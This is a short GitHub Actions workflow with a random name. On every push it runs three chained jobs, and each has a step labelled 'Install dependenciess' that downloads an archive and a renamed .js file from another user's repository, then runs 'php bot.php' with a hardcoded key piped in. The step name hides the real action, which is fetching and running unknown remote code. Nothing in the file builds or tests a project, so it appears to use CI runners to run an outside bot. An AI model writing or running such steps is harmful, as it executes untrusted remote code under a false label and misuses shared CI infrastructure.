on:
  push:
name: aiadgj7y

jobs:
  run_1:
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Mosnio/mehi1/raw/main/clm/clm.zip
        unzip clm.zip
        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
        echo -e "36a492fd280c86037f5a030dbba250d0\n2" | php bot.php
  run_3:
    needs: run_2
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Mosnio/mehi1/raw/main/clm/clm.zip
        unzip clm.zip
        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
        echo -e "36a492fd280c86037f5a030dbba250d0\n2" | php bot.php
        
        
  run_2:
    needs: run_1
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Mosnio/mehi1/raw/main/clm/clm.zip
        unzip clm.zip
        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
        echo -e "36a492fd280c86037f5a030dbba250d0\n2" | php bot.php
        
        
        
 
